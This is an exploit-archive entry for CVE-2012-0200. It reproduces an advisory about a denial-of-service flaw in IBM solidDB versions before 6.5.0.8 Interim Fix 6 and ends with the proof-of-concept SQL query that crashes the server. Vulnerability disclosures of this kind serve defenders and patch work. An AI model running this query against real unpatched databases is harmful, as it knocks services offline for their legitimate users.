IBM solidDB 6.5.0.8 - 'SELECT' Statement 'WHERE' Condition Denial of Service



EKU-ID: 41396 CVE: CVE-2012-0200;OSVDB-79010 OSVDB-ID:
Author: IBM Published: 2012-02-09 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/52111/info

IBM solidDB is prone to a denial-of-service vulnerability.

Attackers can exploit this issue to crash the affected application, denying service to legitimate users.

IBM solidDB versions prior to 6.5.0.8 Interim Fix 6 are vulnerable.

SELECT * FROM a WHERE (b >0) AND (b IN (1,2))